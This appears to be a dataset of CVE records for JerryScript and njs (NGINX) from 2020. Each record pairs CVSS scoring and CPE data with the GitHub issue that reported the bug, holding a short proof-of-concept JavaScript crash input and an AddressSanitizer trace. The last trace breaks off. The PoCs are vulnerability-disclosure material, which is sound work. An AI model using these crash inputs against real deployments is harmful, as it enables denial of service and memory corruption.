{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3976" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3976" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "01F91CD4-9EFF-4338-A18E-64F109090995", "versionEndExcluding": null, "versionEndIncluding": "2.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/jerryscript-project/jerryscript/issues/3976
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
### JerryScript revision git hash: 392ee717128f6daaf0b94e54fc9512eb26d680e2 ### Test case ```javascript ( function ( { a = arguments }) { const arguments } ) ``` In debug build, it triggers an assertion 'scope_stack_p > context_p->scope_stack_p' failed ### Execution steps ./jerry poc.js ### Build cmd python tools/build.py --compile-flag="-fsanitize=address" Stack dump: --- ``` ================================================================= ==59856==ERROR: AddressSanitizer: global-buffer-overflow on address 0x5581992ba27c at pc 0x558198ef79cd bp 0x7ffffcf5f490 sp 0x7ffffcf5f480 READ of size 2 at 0x5581992ba27c thread T0 #0 0x558198ef79cc (/home/yongheng/jerry_clean/build/bin/jerry+0x2d9cc) #1 0x558198f263d7 (/home/yongheng/jerry_clean/build/bin/jerry+0x5c3d7) #2 0x558198f81326 (/home/yongheng/jerry_clean/build/bin/jerry+0xb7326) #3 0x558198f34f6c (/home/yongheng/jerry_clean/build/bin/jerry+0x6af6c) #4 0x558198eff1a3 (/home/yongheng/jerry_clean/build/bin/jerry+0x351a3) #5 0x558198f030ca (/home/yongheng/jerry_clean/build/bin/jerry+0x390ca) #6 0x558198f3dbcb (/home/yongheng/jerry_clean/build/bin/jerry+0x73bcb) #7 0x558198f3f19c (/home/yongheng/jerry_clean/build/bin/jerry+0x7519c) #8 0x558198f2f238 (/home/yongheng/jerry_clean/build/bin/jerry+0x65238) #9 0x558198f33ac8 (/home/yongheng/jerry_clean/build/bin/jerry+0x69ac8) #10 0x558198f3c101 (/home/yongheng/jerry_clean/build/bin/jerry+0x72101) #11 0x558198f0484d (/home/yongheng/jerry_clean/build/bin/jerry+0x3a84d) #12 0x558198f0515a (/home/yongheng/jerry_clean/build/bin/jerry+0x3b15a) #13 0x558198f745c0 (/home/yongheng/jerry_clean/build/bin/jerry+0xaa5c0) #14 0x558198ee044e (/home/yongheng/jerry_clean/build/bin/jerry+0x1644e) #15 0x7f2eec31db96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #16 0x558198ee1219 (/home/yongheng/jerry_clean/build/bin/jerry+0x17219) ``` ---
Heap overflow in jerry-core
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3976/comments
14
2020-07-05T20:43:50Z
2021-06-16T09:03:07Z
https://github.com/jerryscript-project/jerryscript/issues/3976
651,142,365
3,976
1,378
CVE-2020-24345
2020-08-13T19:15:13.807
JerryScript through 2.3.0 allows stack consumption via function a(){new new Proxy(a,{})}JSON.parse("[]",a). NOTE: the vendor states that the problem is the lack of the --stack-limit option
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3977" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3977" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "01F91CD4-9EFF-4338-A18E-64F109090995", "versionEndExcluding": null, "versionEndIncluding": "2.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/jerryscript-project/jerryscript/issues/3977
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
### JerryScript revision git hash: 392ee717128f6daaf0b94e54fc9512eb26d680e2 ### Test case ```javascript function a() { new new Proxy(a, {}) } JSON.parse("[]", a) ``` ### Execution steps ./jerry poc.js ### Build cmd python tools/build.py --compile-flag="-fsanitize=address" Stack dump: --- ``` ASAN:DEADLYSIGNAL ================================================================= ==180140==ERROR: AddressSanitizer: stack-overflow on address 0x7fff1ed99fe8 (pc 0x5632f4db5751 bp 0x7fff1ed9a000 sp 0x7fff1ed99fe0 T0) #0 0x5632f4db5750 in ecma_is_lexical_environment /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/base/ecma-helpers.c:174 #1 0x5632f4db5c78 in ecma_get_lex_env_type /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/base/ecma-helpers.c:274 #2 0x5632f4ca68fa in ecma_op_resolve_reference_value /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-reference.c:276 #3 0x5632f4d219de in vm_loop.lto_priv.485 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:1036 #4 0x5632f4cf8723 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4670 #5 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #6 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #7 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #8 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #9 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #10 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #11 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #12 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #13 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #14 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #15 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #16 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #17 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #18 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #19 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #20 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #21 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #22 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #23 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #24 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #25 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #26 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #27 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #28 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #29 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #30 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #31 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #32 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #33 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 ``` ---
Stack overflow in ecma_is_lexical_environment
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3977/comments
2
2020-07-06T05:01:36Z
2024-09-03T10:11:11Z
https://github.com/jerryscript-project/jerryscript/issues/3977
651,247,064
3,977
1,379
CVE-2020-24346
2020-08-13T19:15:13.880
njs through 0.4.3, used in NGINX, has a use-after-free in njs_json_parse_iterator_call in njs_json.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/325" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200918-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/325" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200918-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "1171CB43-C37C-4242-AD28-A8B94D288BE3", "versionEndExcluding": null, "versionEndIncluding": "0.4.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/nginx/njs/issues/325
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Version:`0.4.2`, git commit `32a70c899c1f136fbc3f97fcc050d59e0bd8c6a5` POC: ```javascript function a() { this[this['use asm'] = this[this[1024] = ArrayBuffer]] = this[ArrayBuffer] = 4000 } JSON.parse("[1, 2, []]", a) ``` cmd: `njs poc.js` Stack dump: ``` ================================================================= ==262019==ERROR: AddressSanitizer: heap-use-after-free on address 0x62b000000210 at pc 0x0000005e7fbc bp 0x7ffecccad3f0 sp 0x7ffecccad3e8 WRITE of size 1 at 0x62b000000210 thread T0 #0 0x5e7fbb in njs_json_parse_iterator_call /home/yongheng/njs/src/njs_json.c:1030:17 #1 0x5e7fbb in njs_json_parse_iterator /home/yongheng/njs/src/njs_json.c:971:15 #2 0x5e7fbb in njs_json_parse /home/yongheng/njs/src/njs_json.c:167:16 #3 0x5ff82e in njs_function_native_call /home/yongheng/njs/src/njs_function.c:707:11 #4 0x507611 in njs_function_frame_invoke /home/yongheng/njs/src/njs_function.h:172:16 #5 0x507611 in njs_vmcode_interpreter /home/yongheng/njs/src/njs_vmcode.c:778:23 #6 0x4c8f01 in njs_process_script /home/yongheng/njs/src/njs_shell.c:843:19 #7 0x4c68ce in njs_process_file /home/yongheng/njs/src/njs_shell.c:562:11 #8 0x4c68ce in main /home/yongheng/njs/src/njs_shell.c:286:15 #9 0x7f10a367db96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #10 0x41c089 in _start (/home/yongheng/njs/build/njs+0x41c089) 0x62b000000210 is located 16 bytes inside of 24632-byte region [0x62b000000200,0x62b000006238) freed by thread T0 here: #0 0x4940fd in __interceptor_free /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3 #1 0x58fefa in njs_array_expand /home/yongheng/njs/src/njs_array.c:386:5 previously allocated by thread T0 here: #0 0x494e37 in __interceptor_posix_memalign /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:226:3 #1 0x77c2fd in njs_memalign /home/yongheng/njs/src/njs_malloc.c:39:11 #2 0x4daeed in njs_mp_alloc_large /home/yongheng/njs/src/njs_mp.c:578:13 #3 0x4daeed in njs_mp_align /home/yongheng/njs/src/njs_mp.c:331:16 SUMMARY: AddressSanitizer: heap-use-after-free /home/yongheng/njs/src/njs_json.c:1030:17 in njs_json_parse_iterator_call Shadow bytes around the buggy address: 0x0c567fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c567fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c567fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c567fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c567fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c567fff8040: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c567fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c567fff8060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c567fff8070: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c567fff8080: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c567fff8090: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==262019==ABORTING ```
heap-use-after-free in njs_json_parse_iterator_call
https://api.github.com/repos/nginx/njs/issues/325/comments
1
2020-06-28T18:40:42Z
2020-10-06T17:02:21Z
https://github.com/nginx/njs/issues/325
646,981,993
325
1,380
CVE-2020-24347
2020-08-13T19:15:13.943
njs through 0.4.3, used in NGINX, has an out-of-bounds read in njs_lvlhsh_level_find in njs_lvlhsh.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/323" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200918-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/323" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200918-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "1171CB43-C37C-4242-AD28-A8B94D288BE3", "versionEndExcluding": null, "versionEndIncluding": "0.4.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/nginx/njs/issues/323
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Version:`0.4.2`, git commit `32a70c899c1f136fbc3f97fcc050d59e0bd8c6a5` POC: ```javascript var once = false ; var a = 1 ; function f ( ) { if ( this [ 8 ] = new Uint32Array ( this , this [ 8 ] , ) ) { a = new Array ( new Uint32Array ( a = new Array ( Array , 3 ) ) , { } , new ArrayBuffer ( this [ 8 ] ) , 2 , 3 ) ; this [ 2 ] = a ; } once = true ; return { } ; } JSON.parse ( "[1, 2, [4, 5]]" , f ) ; ``` cmd: `njs poc.js` Stack dump: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==164285==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004ce9a5 bp 0x000067ce764b sp 0x7ffe994919f0 T0) ==164285==The signal is caused by a READ memory access. ==164285==Hint: this fault was caused by a dereference of a high value address (see register values below). Dissassemble the provided pc to learn which register was used. #0 0x4ce9a5 in njs_lvlhsh_level_find /home/yongheng/njs/src/njs_lvlhsh.c:203:12 #1 0x4ce9a5 in njs_lvlhsh_find /home/yongheng/njs/src/njs_lvlhsh.c:184:16 #2 0x57ef76 in njs_object_property /home/yongheng/njs/src/njs_object_prop.c:59:15 #3 0x4ea207 in njs_value_to_primitive /home/yongheng/njs/src/njs_value.c:156:19 #4 0x59efce in njs_value_to_chain /home/yongheng/njs/src/njs_value_conversion.h:217:19 #5 0x59efce in njs_array_prototype_join /home/yongheng/njs/src/njs_array.c:1630:23 #6 0x5ff82e in njs_function_native_call /home/yongheng/njs/src/njs_function.c:707:11 #7 0x5fdbb5 in njs_function_frame_invoke /home/yongheng/njs/src/njs_function.h:172:16 #8 0x5fdbb5 in njs_function_call2 /home/yongheng/njs/src/njs_function.c:582:11 #9 0x590774 in njs_function_apply /home/yongheng/njs/src/njs_function.h:193:12 #10 0x590774 in njs_array_prototype_to_string /home/yongheng/njs/src/njs_array.c:1539:20 #11 0x5ff82e in njs_function_native_call /home/yongheng/njs/src/njs_function.c:707:11 #12 0x5fdbb5 in njs_function_frame_invoke /home/yongheng/njs/src/njs_function.h:172:16 #13 0x5fdbb5 in njs_function_call2 /home/yongheng/njs/src/njs_function.c:582:11 #14 0x4ea2a6 in njs_function_apply /home/yongheng/njs/src/njs_function.h:193:12 #15 0x4ea2a6 in njs_value_to_primitive /home/yongheng/njs/src/njs_value.c:163:23 #16 0x7369f7 in njs_value_to_number /home/yongheng/njs/src/njs_value_conversion.h:18:15 #17 0x7369f7 in njs_typed_array_constructor /home/yongheng/njs/src/njs_typed_array.c:145:19 #18 0x5ff82e in njs_function_native_call /home/yongheng/njs/src/njs_function.c:707:11 #19 0x507611 in njs_function_frame_invoke /home/yongheng/njs/src/njs_function.h:172:16 #20 0x507611 in njs_vmcode_interpreter /home/yongheng/njs/src/njs_vmcode.c:778:23 #21 0x5fdd23 in njs_function_frame_invoke /home/yongheng/njs/src/njs_function.h:175:16 #22 0x5fdd23 in njs_function_call2 /home/yongheng/njs/src/njs_function.c:582:11 #23 0x5e6583 in njs_function_apply /home/yongheng/njs/src/njs_function.h:193:12 #24 0x5e6583 in njs_json_parse_iterator_call /home/yongheng/njs/src/njs_json.c:1015:15 #25 0x5e6583 in njs_json_parse_iterator /home/yongheng/njs/src/njs_json.c:971:15 #26 0x5e6583 in njs_json_parse /home/yongheng/njs/src/njs_json.c:167:16 #27 0x5ff82e in njs_function_native_call /home/yongheng/njs/src/njs_function.c:707:11 #28 0x507611 in njs_function_frame_invoke /home/yongheng/njs/src/njs_function.h:172:16 #29 0x507611 in njs_vmcode_interpreter /home/yongheng/njs/src/njs_vmcode.c:778:23 #30 0x4c8f01 in njs_process_script /home/yongheng/njs/src/njs_shell.c:843:19 #31 0x4c68ce in njs_process_file /home/yongheng/njs/src/njs_shell.c:562:11 #32 0x4c68ce in main /home/yongheng/njs/src/njs_shell.c:286:15 #33 0x7fc3ca354b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #34 0x41c089 in _start (/home/yongheng/njs/build/njs+0x41c089) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/yongheng/njs/src/njs_lvlhsh.c:203:12 in njs_lvlhsh_level_find ==164285==ABORTING ```
Segfault in njs_lvlhsh_bucket_find
https://api.github.com/repos/nginx/njs/issues/323/comments
0
2020-06-27T19:58:35Z
2020-10-06T16:55:13Z
https://github.com/nginx/njs/issues/323
646,750,520
323
1,381
CVE-2020-24348
2020-08-13T19:15:14.003
njs through 0.4.3, used in NGINX, has an out-of-bounds read in njs_json_stringify_iterator in njs_json.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/322" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200918-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/322" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200918-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "1171CB43-C37C-4242-AD28-A8B94D288BE3", "versionEndExcluding": null, "versionEndIncluding": "0.4.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/nginx/njs/issues/322
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Version:`0.4.2`, git commit `32a70c899c1f136fbc3f97fcc050d59e0bd8c6a5` POC: ```javascript var array = []; var funky; funky = { get value() { array[10000000] = 12; } }; for (var i = 0; i < 10; i++) array[i] = i; array[3] = funky; '' == JSON.stringify(array); ``` cmd: `njs poc.js` Stack dump: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==181398==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000040 (pc 0x7f2cbf620477 bp 0x7fff1a082ad0 sp 0x7fff1a082288 T0) ==181398==The signal is caused by a READ memory access. ==181398==Hint: address points to the zero page. #0 0x7f2cbf620477 in memcpy /build/glibc-OTsEL5/glibc-2.27/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:139 #1 0x4938d1 in __asan_memcpy /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3 #2 0x5eb14a in njs_json_stringify_iterator /home/yongheng/njs/src/njs_json.c:1317:33 #3 0x5eb14a in njs_json_stringify /home/yongheng/njs/src/njs_json.c:283:12 #4 0x5ff82e in njs_function_native_call /home/yongheng/njs/src/njs_function.c:707:11 #5 0x507611 in njs_function_frame_invoke /home/yongheng/njs/src/njs_function.h:172:16 #6 0x507611 in njs_vmcode_interpreter /home/yongheng/njs/src/njs_vmcode.c:778:23 #7 0x4c8f01 in njs_process_script /home/yongheng/njs/src/njs_shell.c:843:19 #8 0x4c68ce in njs_process_file /home/yongheng/njs/src/njs_shell.c:562:11 #9 0x4c68ce in main /home/yongheng/njs/src/njs_shell.c:286:15 #10 0x7f2cbf586b96 in __libc_start_main 